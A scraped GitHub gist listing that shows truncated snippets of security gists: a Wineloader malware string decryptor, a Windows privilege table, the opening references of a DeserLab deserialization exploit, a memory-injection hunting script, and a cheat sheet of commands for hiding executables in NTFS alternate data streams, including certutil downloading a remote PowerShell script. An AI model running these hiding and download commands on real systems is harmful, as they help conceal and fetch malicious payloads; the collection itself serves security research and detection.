Skip to content

Instantly share code, notes, and snippets.

View nasbench's full-sized avatar
📚

Nasreddine Bencherchali nasbench

📚
369 followers · 84 following
View GitHub Profile
@X-Junior
X-Junior / Wineloader_String_Decryptor.py
Created April 18, 2024 19:47
Wineloader Static String Decryptor
from Crypto.Cipher import ARC4
from capstone import *
from capstone.x86 import *
import pefile , sys , os
'''
Author: Mohamed Ashraf (@X__Junior)
make sure you are passing wineloader and not the loader of wineloader, if you suspect it's the loader then use https://raw.githubusercontent.com/tccontre/KnowledgeBase/main/malware_re_tools/wineloader_dll_side_load/wineloader_extractor.py , to extract the shellcode
tested samples:
27c0935a22862475bb3fd516f93bd466f8021f77727e83f53d67d76978b439ee
@jsecurity101
jsecurity101 / Privileges.txt
Created July 23, 2022 01:00
System privileges and their values
Author: Jonathan Johnson
Data pulled via winnt.h / LookupPrivilegeValue
SE_CREATE_TOKEN_NAME / SeCreateTokenPrivilege / 2
SE_ASSIGNPRIMARYTOKEN_NAME / SeAssignPrimaryTokenPrivilege / 3
SE_LOCK_MEMORY_NAME / SeLockMemoryPrivilege / 4
SE_INCREASE_QUOTA_NAME / SeIncreateQuotoPrivilege / 5
SE_MACHINE_ACCOUNT_NAME / SeMachineAccountPrivilege / 6
SE_TCB_NAME / SeTcbPrivilege / 7
SE_SECURITY_NAME / SeSecurityPrivilege/ 8
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active May 2, 2024 18:10
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@DiabloHorn
DiabloHorn / deserlab_exploit.py
Created September 9, 2017 18:37
Exploit for the DeserLab vulnerable implementation
#!/usr/bin/env python
"""
DiabloHorn - https://diablohorn.com
References
https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active April 22, 2024 19:09
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION